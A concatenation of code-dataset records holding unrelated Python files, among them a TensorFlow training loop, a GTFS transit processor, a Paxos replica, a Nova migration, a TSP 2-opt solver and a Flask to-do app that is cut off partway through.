tf.train.latest_checkpoint('./model/0.0001_64/'))\n sess.run(tf.global_variables_initializer())\n saver.restore(sess, ckpt.model_checkpoint_path)\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(coord=coord)\n\n writer = tf.summary.FileWriter('path/to/transfer_log/transfer_train_log')\n writer_test = tf.summary.FileWriter('path/to/transfer_log/transfer_testlog')\n for i in range(epochs):\n batch_x, batch_y = sess.run([train_batch_image, train_batch_label])\n summary, acc, loss_np, _ = sess.run([merged, train_acc, loss, train_step],\n feed_dict={x: batch_x, y: batch_y})\n\n test_x, test_y = sess.run([test_batch_image, test_batch_label])\n summary_test, test_loss, y_pred_, test_acc = sess.run([merged, loss, y_pred, train_acc],\n feed_dict={x: test_x, y: test_y})\n\n writer.add_summary(summary, i)\n writer_test.add_summary(summary_test, i)\n \n train_costs.append(loss_np)\n train_accs.append(acc)\n test_accs.append(test_acc)\n if i % 10 == 0:\n print('***************epochs:', i, '*************')\n print('***************train loss:', loss_np)\n print('***************train accruacy:', acc, '*************')\n print(\"***********test_accuracy:\", test_acc, \"*********\\n\")\n\n save_path = \"E:\\\\tf_learning(2)\\\\logs\\\\transfer_from_base_to_casy\\\\\"\n np.savetxt(os.path.join(save_path, \"train_loss.txt\"), train_costs)\n np.savetxt(os.path.join(save_path, \"train_acc.txt\"), train_accs)\n np.savetxt(os.path.join(save_path, \"test_acc.txt\"), test_accs)\n\n\n # if i > 80 and i % 10 == 0:\n # saver.save(sess, './new_transfered_model/model.ckpt', global_step=i + 1)\n # if loss_np < 0.01:\n # break\n # if test_acc > 0.9:\n # time2 = round((time.time() - time1) / 60, 2)\n # print(\"达到 %.3f cost %d iterations and %.2f min\" % (test_acc, i, time2))\n # if test_acc > 0.95:\n # time2 = round((time.time() - time1) / 60, 2)\n # print(\"达到 %.3f cost %d iterations and %.2f min\" % (test_acc, i, time2))\n # if test_acc > 0.98:\n # time2 = round((time.time() - time1) / 60, 2)\n # print(\"达到 %.3f cost %d iterations and %.2f min\" % (test_acc, i, time2))\n # break\n\n writer.close()\n coord.request_stop()\n # queue需要关闭,否则报错\n coord.join(threads)\n time2 = round((time.time() - time1) / 60, 2)\n print(\"cost time: %.2f min\" % time2)\n # return test_y, np.argmax(y_pred_, 1)\n\n\n# os.chdir('E:\\\\transfer_learning\\\\')\nos.chdir(os.path.dirname(__file__))\ntrain()\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"transfer_train_from_base_to_others.py","file_name":"transfer_train_from_base_to_others.py","file_ext":"py","file_size_in_byte":15260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"482621732","text":"#!/usr/bin/env python3\nimport pandas as pd\nimport re\nimport sys\nimport argparse\nimport os\nimport functools\n\n\ndef time_to_parts(time):\n time_parts = [int(x) for x in time.split(\":\")]\n return time_parts[0] * 3600 + time_parts[1] * 60 + time_parts[2]\n\n\ndef compute_diff(t1, t2):\n time1 = time_to_parts(t1)\n time2 = time_to_parts(t2)\n return time2 - time1\n\n\ndef process_name(st_name):\n return re.sub(r\" - [ABC]\", \"\", st_name)\n\n\ndef compute_all_diferences(arrival_times, departure_times):\n return [compute_diff(first, second)\n for first, second in zip(arrival_times, departure_times)]\n\n\ndef create_csv(joined, output_path, suffix, stops):\n grouped = joined.groupby(\"trip_id\", sort=True)\n data = []\n for group in grouped:\n g = group[1].sort_values(by=\"stop_sequence\")\n stations = [\"->\".join(x) for x in zip(g.stop_name.apply(process_name),\n g.stop_name[1:].apply(process_name))]\n times = compute_all_diferences(g.arrival_time, g.arrival_time[1:])\n data += [{\"section\": x[0], \"time\": x[1]} for x in zip(stations, times)]\n df = pd.DataFrame.from_records(data)\n grouped = df.groupby(\"section\").mean()\n df2 = grouped.copy()\n sections = grouped.index.map(lambda x: x.split(\"->\"))\n df2[\"departure_station\"] = [x[0] for x in sections]\n df2[\"arrival_station\"] = [x[1] for x in sections]\n df2.to_csv(os.path.join(output_path, \"times{0}.csv\".format(suffix)))\n stops2 = stops.copy()\n stops2[\"stop_name\"] = stops2.stop_name.apply(lambda x: process_name(x)[0])\n stops_grouped = stops2.groupby(\"stop_name\").mean()\n stops_grouped[[\"stop_lat\", \"stop_lon\"]].apply(lambda x: x.round(6)).to_csv(os.path.join(output_path, \"locations{0}.csv\".format(suffix)))\n\n\ndef parse_arguments(argv):\n parser = argparse.ArgumentParser(description='Process Prague data')\n parser.add_argument('data_path', type=str,\n help=\"Path to the folder containing GTFS files\")\n parser.add_argument(\"output_path\", type=str,\n help=\"Path to output folder.\")\n return parser.parse_args(argv)\n\n\ndef main(argv):\n args = parse_arguments(argv)\n stops_cols = [\"stop_id\", \"stop_lat\", \"stop_lon\", \"stop_name\"]\n stops = pd.read_csv(os.path.join(args.data_path, \"stops.txt\"))[stops_cols]\n stop_times = pd.read_csv(os.path.join(args.data_path,\n \"stop_times.txt\"))\n trips = pd.read_csv(os.path.join(args.data_path, \"trips.txt\"))\n calendar = pd.read_csv(os.path.join(args.data_path, \"calendar.txt\"))\n routes = pd.read_csv(os.path.join(args.data_path, \"routes.txt\"))\n joined = functools.reduce(lambda x, y: x.merge(y[0], on=y[1]),\n [(stop_times, \"trip_id\"),\n (calendar, \"service_id\"), (stops, \"stop_id\"),\n (routes, \"route_id\")], trips)\n print(\"Data loaded\")\n night_start = time_to_parts(\"00:00:00\")\n night_end = time_to_parts(\"05:00:00\")\n\n joined[\"arrival_time_seconds\"] = joined.arrival_time.apply(time_to_parts)\n joined[\"departure_time_seconds\"] = joined.departure_time.apply(time_to_parts)\n\n night_time = joined[(joined.departure_time_seconds >= night_start) &\n (joined.departure_time_seconds < night_end)]\n day_time = joined[joined.departure_time_seconds >= night_end]\n\n create_csv(night_time, args.output_path, \"_night\", stops)\n print(\"Created night data.\")\n create_csv(day_time, args.output_path, \"_day\", stops)\n print(\"Created day data.\")\n\n # joined = trips.merge(stop_times, on=\"trip_id\").\n # merge(calendar, on=\"service_id\").merge(stops, on=\"stop_id\").\n # merge(routes, on=\"route_id\")\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","sub_path":"process_data.py","file_name":"process_data.py","file_ext":"py","file_size_in_byte":3794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"101022662","text":"from gpiozero import LED\nfrom time import sleep \nimport os\nimport datetime \n\nopenDoor = LED(27) # PIN 27\ncloseDoor = LED(22) # PIN 22\n\ndef feed(time):\n time = float(time) # time to hold the 'on' task\n openDoor.on() # open the door\n closeDoor.off() # don't close the door\n sleep(1 + time)\n openDoor.off()\n\ndef close():\n timeOff = 1 # time to hold to the 'off' task\n closeDoor.on() # close the door \n sleep(timeOff)\n closeDoor.off()\n ","sub_path":"python/doorSystem.py","file_name":"doorSystem.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"416751351","text":"\"\"\"\r\nAdvent of code 2020\r\nDay1 Part2\r\nThe point of this exercise is to find 3 entries that sum to 2020 and then multiply\r\nthem to entray to get the answer\r\n\"\"\"\r\n#get file object\r\nimport random as r\r\nf = open(\"input.txt\", \"r\")\r\nliste = []\r\nwhile(True):\r\n\t#read next line\r\n\tline = f.readline()\r\n\t#if line is empty, you are done with all lines in the file\r\n\tif not line:\r\n\t\tbreak\r\n\t#you can access the line\r\n\tliste.append(line.strip())\r\n\r\n\r\n#Triple loop to try every sum in the array\r\nfor i in range(len(liste)):\r\n for y in range(len(liste)):\r\n for x in range(len(liste)):\r\n if int(liste[i])+int(liste[y])+int(liste[x]) == 2020:\r\n \r\n print(int(liste[i])*int(liste[y])*int(liste[x]))\r\n\r\n\r\nf.close","sub_path":"Day1/Mission1_P2.py","file_name":"Mission1_P2.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"415266769","text":"from faker import Faker\n\nfake = Faker()\n\nclass BusinessCard:\n def __init__(self, first_name, last_name, company, job, email):\n self.first_name = first_name\n self.last_name = last_name\n self.company = company\n self.job = job\n self.email = email\n\n @property\n def label_lenght(self):\n return len(f\"{self.first_name}, {self.last_name}\")\n\n @property\n def __str__(self):\n return f'{self.first_name}, {self.last_name},{self.company}, {self.job}, {self.email}'\n\n def __repr__(self):\n return 'BusinessCard(first_name: %s, last_name: %s, company: %s, job: %s, email: %s, phone_number: %s)' % (\n self.first_name, self.last_name, self.company, self.job, self.email, self.phone_number)\n\nclass BaseContact(BusinessCard):\n def __init__(self, phone_number, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.phone_number = phone_number\n\n def __str__(self):\n return 'first_name : {}, last_name : {}, company {}, job : {}, email :{}, phone_number : {}' \\\n .format(self.first_name, self.last_name, self.company, self.job, self.email, self.phone_number)\n\n def contact(self):\n return f\"Wybieram prywatny numer {self.phone_number} i dzwonię do {self.first_name} {self.last_name}.\"\n\n\nclass BusinessContact(BaseContact):\n def __init__(self, phone_job, *args, **kwargs):\n super().__init__(phone_job, *args, **kwargs)\n self.phone_number = phone_job\n\n def contact(self):\n return f\"Wybieram prywatny numer {self.phone_number} i dzwonię do {self.first_name} {self.last_name}.\"\n\n\n# Funkcje drukowania list wizytówek\n\ndef base(copies):\n base_contact_list = []\n for contact in range(copies):\n contact = BaseContact(\n first_name=fake.first_name(),\n last_name=fake.last_name(),\n company=fake.company(),\n job=fake.job(),\n phone_number=fake.phone_number(),\n email=fake.email()\n )\n base_contact_list.append(contact)\n return base_contact_list\n\n\ndef business(copies):\n business_contact_list = []\n for contact in range(copies):\n contact = BusinessContact(\n first_name=fake.first_name(),\n last_name=fake.last_name(),\n company=fake.company(),\n job=fake.job(),\n phone_job=fake.phone_number(),\n email=fake.email(),\n )\n business_contact_list.append(contact)\n\n return business_contact_list\n\ndef create_contact():\n type = input(\"Jakiego rodzaju chcesz wizytówki? 1 = Business, 2 = Bazowe: \")\n copies = int(input(\"Ile chcesz wizytówek?: \"))\n if type == \"1\":\n contacts = business(copies)\n print(business(copies))\n print(len(contacts))\n\n elif type == \"2\":\n contacts = base(copies)\n print(base(copies))\n print(len(contacts))\n\n else:\n error = \"error\"\n print(error)\n exit()\n\n\n# Program\nif __name__ == \"__main__\":\n print(\"Hello\")\n print(\"Print Y/N to create new contact cards: \")\n\n choice = input(\"Enter your choice: \")\n\nwhile True:\n if choice == \"Y\" or \"y\":\n create_contact()\n continue\n\n else:\n error = \"error\"\n print(error)\n exit()\n","sub_path":"Kodilla/Module_7/Module_7_task_1.py","file_name":"Module_7_task_1.py","file_ext":"py","file_size_in_byte":3274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"618681310","text":"\nimport itertools as it\nimport logging\n\nfrom . import common\nfrom .common import msg\nimport utils\n\n\nclass Replica(common.PaxosActor):\n def __init__(self, leaders, hndlr=None):\n self.log = logging.getLogger(__name__)\n self.log.addHandler(hndlr or logging.NullHandler())\n\n self.leaders = leaders\n\n self.slot_num = 0\n self.proposals = utils.SparseList()\n self.decisions = utils.SparseList()\n\n self._routes = {\n msg.request: self._request,\n msg.decision: self._decision,\n }\n\n def recover(self, states):\n def _join(args):\n assert(x == args[0] for x in args)\n return args[0]\n\n dcns = utils.SparseList.merged(*[utils.SparseList.from_serializable(st)\n for st, _ in states])\n self.proposals = utils.SparseList()\n try:\n slot, *args = next(dcns)\n self.decisions = utils.SparseList(\n [_join(args)] + [_join(args) for _, *args in dncs], start=slot)\n self.slot_num = max(slot for _, slot in states)\n except:\n pass\n\n def get_state(self):\n return (utils.SparseList.serializable(self.decisions), self.slot_num)\n\n def all_clear(self):\n return (not self.proposals or\n all(p is None for p in self.proposals))\n\n def _request(self, message):\n self.log.info(\"Received request: %s\", message)\n return self.propose(message['command'])\n\n def propose(self, command):\n if command in self.decisions:\n return []\n\n slot = min({\n s for s, prop, decn in utils.SparseList.merged(\n self.proposals, self.decisions)\n if prop is None and decn is None\n } or {max(len(self.decisions), len(self.proposals), self.slot_num)})\n\n self.log.debug(\"Proposing %s -> %s\", slot, command)\n\n self.proposals[slot] = command\n return [{\n 'action': msg.propose,\n 'slot': slot,\n 'command': command,\n 'to': leader,\n } for leader in self.leaders]\n\n def _decision(self, message):\n slot = message['slot']\n self.log.info(\"Decision received for slot %s: %s\",\n slot, message['command'])\n if slot < self.slot_num:\n return []\n assert(self.decisions[slot] in {None, message['command']})\n self.decisions[slot] = message['command']\n responses = []\n\n while self.decisions[self.slot_num]:\n op = self.decisions[self.slot_num]\n\n prop = self.proposals.pop(self.slot_num)\n if prop:\n responses.extend(self.propose(prop))\n\n responses.append({\n 'action': msg.response,\n 'command': op,\n 'slot': self.slot_num,\n })\n self.slot_num += 1\n\n del self.decisions[:self.slot_num]\n del self.proposals[:self.slot_num]\n\n return responses\n","sub_path":"paxos/replica.py","file_name":"replica.py","file_ext":"py","file_size_in_byte":3020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"131396048","text":"#!/usr/bin/python3\n# -*- coding:utf-8 -*-\n#装饰器示例\n\nimport functools,time\n\ndef metric(func):\n @functools.wraps(func)\n def wrapper(*args,**kw):\n t = time.time()\n f = func(*args,**kw)\n print(\"This func {} takes {} times.\".format(func.__name__, time.time() - t))\n return f\n return wrapper\n\n\n#引用\n\n@metric\ndef fast(x,y):\n time.sleep(0.00000005)\n return x + y\n\n\n@metric\ndef slow(x,y,z):\n time.sleep(0.1)\n return x * y * z\n\n\nm = fast(11,22)\nn = slow(2,3,4)\nprint('m : {} \\t n : {}'.format(m,n))\n","sub_path":"decorator.py","file_name":"decorator.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"564883115","text":"# Copyright 2012 OpenStack LLC.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom sqlalchemy import Boolean, Column, DateTime, String, ForeignKey, Integer\nfrom sqlalchemy import MetaData, String, Table\n\nfrom nova import context\nfrom nova import db\n\nfrom nova.openstack.common import log as logging\n\nLOG = logging.getLogger(__name__)\n\ndef _populate_instance_type_extra_specs(instance_types):\n try:\n instance_type_rows = list(instance_types.select().execute())\n for instance_type in instance_type_rows:\n flavorid = instance_type.flavorid\n name = instance_type.name\n if (name == 'm1.tiny') or \\\n (name == 'm1.small') or \\\n (name == 'm1.medium') or \\\n (name == 'm1.large') or \\\n (name == 'm1.xlarge'):\n extra_specs = dict(cpu_arch='s== x86_64',\n hypervisor_type='s== QEMU')\n elif (name == 'cg1.small'):\n extra_specs = dict(\n cpu_arch='s== x86_64',\n gpu_arch='s== fermi',\n gpus='= 1',\n hypervisor_type='s== LXC')\n elif (name == 'cg1.medium'):\n extra_specs = dict(\n cpu_arch='s== x86_64',\n gpu_arch='s== fermi',\n gpus='= 2',\n hypervisor_type='s== LXC')\n elif (name == 'cg1.large'):\n extra_specs = dict(\n cpu_arch='s== x86_64',\n gpu_arch='s== fermi',\n gpus='= 3',\n hypervisor_type='s== LXC')\n elif (name == 'cg1.xlarge'):\n extra_specs = dict(\n cpu_arch='s== x86_64',\n gpu_arch='s== fermi',\n gpus='= 4',\n hypervisor_type='s== LXC')\n elif (name == 'cg1.2xlarge'):\n extra_specs = dict(\n cpu_arch='s== x86_64',\n gpu_arch='s== fermi',\n gpus='= 4',\n hypervisor_type='s== LXC')\n elif (name == 'cg1.4xlarge'):\n extra_specs = dict(\n cpu_arch='s== x86_64',\n gpu_arch='s== fermi',\n gpus='= 4',\n hypervisor_type='s== LXC')\n elif (name == 'sh1.small') or \\\n (name == 'sh1.medium') or \\\n (name == 'sh1.large') or \\\n (name == 'sh1.xlarge') or \\\n (name == 'sh1.2xlarge') or \\\n (name == 'sh1.4xlarge') or \\\n (name == 'sh1.8xlarge') or \\\n (name == 'sh1.16xlarge') or \\\n (name == 'sh1.32xlarge'):\n extra_specs = dict(\n cpu_arch='s== x86_64',\n system_type='s== UV',\n hypervisor_type='s== QEMU')\n elif (name == 'tp64.8x8'):\n extra_specs = dict(\n cpu_arch='s== tilepro64',\n hypervisor_type='s== tilera_hv',\n vcores='=64')\n\n db.instance_type_extra_specs_update_or_create(\n context.get_admin_context(),\n flavorid,\n extra_specs)\n\n except Exception:\n LOG.exception('Exception while creating extra_specs table')\n raise\n\n\ndef upgrade(migrate_engine):\n meta = MetaData()\n meta.bind = migrate_engine\n\n instance_types = Table('instance_types', meta, autoload=True)\n is_public = Column('is_public', Boolean)\n\n instance_types.create_column(is_public)\n instance_types.update().values(is_public=True).execute()\n\n # New table.\n instance_type_projects = Table('instance_type_projects', meta,\n Column('created_at', DateTime(timezone=False)),\n Column('updated_at', DateTime(timezone=False)),\n Column('deleted_at', DateTime(timezone=False)),\n Column('deleted', Boolean(), default=False),\n Column('id', Integer, primary_key=True, nullable=False),\n Column('instance_type_id',\n Integer,\n ForeignKey('instance_types.id'),\n nullable=False),\n Column('project_id', String(length=255)),\n mysql_engine='InnoDB',\n mysql_charset='utf8'\n )\n\n try:\n instance_type_projects.create()\n except Exception:\n LOG.error(_(\"Table |%s| not created!\"), repr(instance_type_projects))\n raise\n\n _populate_instance_type_extra_specs(instance_types)\n\n\ndef downgrade(migrate_engine):\n meta = MetaData()\n meta.bind = migrate_engine\n\n instance_types = Table('instance_types', meta, autoload=True)\n is_public = Column('is_public', Boolean)\n\n instance_types.drop_column(is_public)\n\n instance_type_projects = Table(\n 'instance_type_projects', meta, autoload=True)\n instance_type_projects.drop()\n","sub_path":"nova/db/sqlalchemy/migrate_repo/versions/132_add_instance_type_projects.py","file_name":"132_add_instance_type_projects.py","file_ext":"py","file_size_in_byte":6183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"313351402","text":"from dialog_crf import *\nimport argparse\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Train a basic CRF for dialog annotation')\n parser.add_argument('dev_dir',\n help=\"Path of a directory containing testing docs.\")\n parser.add_argument('output_file',\n help=\"Path of output model file.\")\n args = parser.parse_args()\n test(test_dir=args.dev_dir,\n feature_ext_fn=advanced_dlg2feat,\n output_path=args.output_file)\n","sub_path":"HW3/evaluate_model.py","file_name":"evaluate_model.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"129848828","text":"def get_username_from_github():\r\n import subprocess\r\n import re\r\n\r\n remotes_string = subprocess.check_output(\r\n [\"git\", \"remote\", \"-v\"]\r\n ).decode(\"utf8\")\r\n # print(remotes_string)\r\n # remotes_list = remotes_string.split()\r\n # remote = remotes_list[1]\r\n # print(remote)\r\n matches = re.search('origin.*?github.com.(.*?)/softcite-dataset', remotes_string)\r\n username = matches.group(1)\r\n if (username == \"howisonlab\"):\r\n username = \"jameshowison\"\r\n\r\n return username.lower()\r\n","sub_path":"code/getUsername.py","file_name":"getUsername.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"274182605","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# File name: declination_bias_plot.py\n\"\"\"\nCreated on Tue Mar 13 11:01:41 2018\n\n@author: Neo(liuniu@smail.nju.edu.cn)\n\nPlot the declination differences for ICRF2 defining sources\nto evince the declination bias or regional error in VLBI, or more\nspecifically ICRF, system.\n\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n# ----------------------------- FUNCTIONS -----------------------------\ndef dec_bias_plot(fname, Dec, DDec, EDDec, ymin=-500, ymax=500):\n '''Plot the declination differences.\n\n Parameters\n ----------\n fname : string\n output figure name, including the full path;\n Dec : array, float\n Declinations in degree;\n DDec : array of float\n Declination differences in micro-arcsecond;\n EDDec : array of float\n Formal uncertainties of declination difference in micro-as;\n ymin/ymax : array of float\n minimum/maximum of the y-axis.\n\n Returns\n ----------\n None\n '''\n\n plt.figure(figsize=(10, 6))\n # plt.text(-90, 0.51, '$\\\\times 10^3$', fontsize=12)\n plt.hlines(y=0, xmin=-90, xmax=90, linestyles='dashed', lw=0.5)\n plt.errorbar(Dec, DDec, yerr=EDDec, fmt='b.', elinewidth=0.025,\n markersize=3)\n plt.xlabel('Dec.(deg)', fontsize=18)\n plt.ylabel('$\\Delta\\delta$ ($\\mu$as)', fontsize=18)\n plt.xticks(np.arange(-90, 91, 30), fontsize=18)\n # plt.yticks(np.arange(-0.4, 0.5, 0.2),\n # ('$-400$', '$-200$', '0', '200', '400'), fontsize=20)\n # ('$-400$', '$-200$', '0', '200', '400')\n plt.xlim([-90, 90])\n # plt.ylim([-500, 500])\n plt.ylim([ymin, ymax])\n plt.savefig(fname)\n plt.close()\n\n\n# ------------------------------------------------------\ndef read_icrf2():\n '''Read ICRF2 file.\n\n Parameters\n ----------\n None\n\n Returns\n ----------\n ivsn : array of string\n IVS designation of source name;\n Dec : array of float\n Declination in degree;\n e_Dec : array of float\n formal error of RA/Dec in micro-arcsecond;\n Flag : array of character\n flag of source classification in ICRF2 catalog.\n '''\n\n icrf2_fil = \"/Users/Neo/Astronomy/Data/catalogs/icrf/icrf2.dat\"\n\n ivsn, Flag = np.genfromtxt(icrf2_fil,\n usecols=(1, 3), dtype=str, unpack=True)\n Decd, Decm, Decs, e_Dec_as = np.genfromtxt(icrf2_fil,\n usecols=(7, 8, 9, 11),\n unpack=True)\n\n# determine the sign of Declination\n strDecs = np.genfromtxt(icrf2_fil, usecols=(7,), dtype=str)\n signstr = [x[0] for x in strDecs]\n Dec_sign = np.where(np.array(signstr) == '-', -1, 1)\n\n# calculate the position\n Dec = Decd + Dec_sign * (Decm / 60.0 + Decs / 3600) # degree\n\n# unit: as -> uas\n e_Dec = e_Dec_as * 1.0e6\n\n return ivsn, Dec, e_Dec, Flag\n\n\n# ------------------------------------------------------\ndef get_icrf2_def():\n '''Get ICRF2 defining source position.\n\n Parameters\n ----------\n None\n\n Returns\n ----------\n ivsnD : array of string\n IVS designation of source name;\n DecD : array of float\n Declination in degree;\n e_DecD : array of float\n formal error of RA/Dec in micro-arcsecond;\n '''\n\n # fetch the whole ICRF2 data\n ivsn, Dec, e_Dec, Flag = read_icrf2()\n\n # find ICRF2 defining sources\n index = (Flag == 'D')\n\n # Extract the data for subset of ICRF2 defining.\n ivsnD = ivsn[index]\n DecD = Dec[index]\n e_DecD = e_Dec[index]\n\n # To verify if we get the correct data\n if ivsnD.size == 295:\n return ivsnD, DecD, e_DecD\n else:\n print(\"Error in program get_icrf2_def\")\n exit()\n\n\n# ------------------------------------------------------\ndef Xmatch(sou1, DC1, DC_err1, sou2, DC2, DC_err2):\n '''Crossmatch between two catalogs.\n\n Parameters\n ----------\n sou1/sou2 : array of string\n Source name\n DC1/DC2 : array of float\n Declination given in degree\n DC_err1/DC_err2 : array of float\n Formal uncertainty of declination in micro-arcsecond\n\n Returns\n ----------\n soucom : array of string\n Common source name\n DC1com/DC2com : array of float\n Declinations for common sources in degree\n DC_err1com/DC_err2com : array of float\n Formal uncertainty of declination in micro-arcsecond\n\n '''\n\n soucom = []\n index1 = []\n index2 = []\n\n for i, soui in enumerate(sou1):\n indarr = np.where(sou2 == soui)[0]\n\n if indarr:\n soucom.append(soui)\n index1.append(i)\n j = indarr[0]\n index2.append(j)\n\n # Retieve the data for common sources\n soucom = np.array(soucom)\n DC1com = np.take(DC1, index1)\n DC2com = np.take(DC2, index2)\n DC_err1com = np.take(DC_err1, index1)\n DC_err2com = np.take(DC_err2, index2)\n\n return [soucom,\n DC1com, DC_err1com,\n DC2com, DC_err2com]\n\n\n# ------------------------------------------------------\ndef position_diff_calc(dat1, dat2):\n '''Calculate the declination difference.\n\n Parameters\n ----------\n dat1, dat2 : list, containing\n sou : source name\n DC : declination, degree\n DC_err : formal uncertainty of DC, mirco-as\n\n Returns\n ----------\n dif : list, containing:\n soucom : common source names\n DCcom : declination of common sources\n dDC : difference of DC, uas\n dDC_err : formal uncertainty of dDC sqrt(DC_err1^2 + DC_err2^2), uas\n '''\n\n sou1, DC1, DC_err1 = dat1\n sou2, DC2, DC_err2 = dat2\n\n # Cross-match\n soucom, DC1com, DC_err1com, DC2com, DC_err2com = Xmatch(\n sou1, DC1, DC_err1, sou2, DC2, DC_err2)\n\n # Degree -> micro-as\n dDC = (DC1com - DC2com) * 3.6e9\n dDC_err = np.sqrt(DC_err1com**2 + DC_err2com**2)\n\n return [soucom, DC2com, dDC, dDC_err]\n\n\n# ------------------------------------------------------\ndef dec_bias_wrtICRF2(sou, DC, DC_err, label):\n '''Plot the declination difference wrt ICRF2 catalogs via defining sources.\n\n Take 'sol - ICRF2' in sense.\n\n Parameters\n ----------\n sou : array of string\n source name\n DC : array of float\n declination in degree\n DC_err : array of float\n formal error of DC\n\n Returns\n ----------\n None\n '''\n\n # Get the declination of 295 ICRF2 defining sources.\n ivsnD, DecD, e_DecD = get_icrf2_def()\n\n # Calculate the difference\n soucom, DCcom, dDC, dDC_err = position_diff_calc(\n [sou, DC, DC_err], [ivsnD, DecD, e_DecD])\n\n # Plot the difference\n dec_bias_plot('/Users/Neo/Astronomy/Works/201711_GDR2_ICRF3/plots/'\n '%s_icrf2_DecDif.eps' % label, DCcom, dDC, dDC_err,\n ymin=-200, ymax=200)\n\n\n# --------------------------------- END --------------------------------\n","sub_path":"declination_bias_plot.py","file_name":"declination_bias_plot.py","file_ext":"py","file_size_in_byte":6945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"442829132","text":"from py2opt.routefinder import RouteFinder\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport sys\nfrom sys import stdout as out\nimport os\n\ndef get_distance_matrix(coords):\n matrix = []\n \n for x in coords:\n dists = []\n \n for y in coords:\n dists.append(np.linalg.norm(np.array(x) - np.array(y)))\n \n matrix.append(dists)\n \n return matrix\n\n\n\n\ndef two_opt(dist_mat, cities_names):\n route_finder = RouteFinder(dist_mat, cities_names, iterations=5)\n best_distance, best_route = route_finder.solve()\n\n with open('hint.txt', 'w') as f:\n lines = []\n for adj in make_adjacent_matrix(best_route):\n for x in adj:\n lines.append(str(x)+'\\n')\n f.writelines(lines)\n return best_route\n\n\ndef make_adjacent_matrix(best_route):\n lastIndex = -1\n cityIndex = -1\n n = len(best_route)\n matriz = np.zeros((n,n), dtype=np.float64)\n for i in range(n):\n cityName = best_route[i]\n cityIndex = int(cityName.split(' ')[1]) - 1\n \n if i != 0:\n # fazer adjacencia\n matriz[lastIndex][cityIndex] = 1\n\n lastIndex = cityIndex\n\n matriz[int(best_route[-1].split()[1])-1][0] = 1\n return matriz\n\ndef read_file():\n if(len(sys.argv) == 2):\n\n if(os.path.isfile(sys.argv[1])):\n coords = []\n places = []\n # lê as coordenadas do arquivo de entrada\n with open(sys.argv[1], 'r') as f:\n\n lines = f.readlines()\n\n if('EOF' in lines[-1]):\n lines = lines[:len(lines)-1]\n\n crit_zone = False\n for line in lines:\n if(not crit_zone and 'NODE_COORD_SECTION' in line):\n crit_zone = True\n elif(crit_zone):\n coords.append((float(line.split()[1]), float(line.split()[2])))\n\n for x in range(1, len(coords)+1):\n places.append('City ' + str(x))\n\n # calcula 2opt\n brt = two_opt(get_distance_matrix(coords), places)\n\n polygon = []\n for x in brt:\n\n polygon.append(coords[int(x.split()[1])-1])\n \n polygon.append(coords[0])\n \n xs, ys = zip(*polygon) #create lists of x and y values\n\n plt.figure()\n plt.scatter(*zip(*polygon), linewidths=0.00001)\n plt.plot(xs,ys) \n plt.show() # if you need...\n\n\n\n\n\n elif(os.path.isdir(sys.argv[1])):\n\n for file in os.listdir(sys.argv[1]):\n \n try:\n coords = []\n places = []\n # lê as coordenadas do arquivo de entrada\n with open(os.path.join(sys.argv[1], file), 'r') as f:\n\n lines = f.readlines()\n\n if('EOF' in lines[-1]):\n lines = lines[:len(lines)-1]\n\n crit_zone = False\n for line in lines:\n if(not crit_zone and 'NODE_COORD_SECTION' in line):\n crit_zone = True\n elif(crit_zone):\n coords.append((float(line.split()[1]), float(line.split()[2])))\n\n for x in range(1, len(coords)+1):\n places.append('City ' + str(x))\n\n # resolve o problema\n solve(get_distance_matrix(coords), places, sys.argv[1])\n\n except Exception as e:\n\n print('ERROR: Failed to solve problem from file \\'' + file + '\\'')\n print(e)\n else:\n print('ERROR: Specified path is nither a file or a directory')\n else:\n # resolve o toy problem\n two_opt([[0, 29, 15, 35], [29, 0, 57, 42], [15, 57, 0, 61], [35, 42, 61, 0]], ['A', 'B', 'C', 'D'])\n\n\nread_file()","sub_path":"2opt.py","file_name":"2opt.py","file_ext":"py","file_size_in_byte":4008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"459928384","text":"from flask import Flask, render_template, request, redirect\nfrom datetime import datetime\nfrom flask_sqlalchemy import SQLAlchemy\n\n\napp = Flask(__name__)\napp.config[\"SQLALCHEMY_DATABASE_URI\"] = \"sqlite:///pytodolist.db\"\ndb = SQLAlchemy(app)\n\nnow = datetime.now()\n\n\nclass Daily(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n item = db.Column(db.String(100), nullable=False)\n\n\nclass 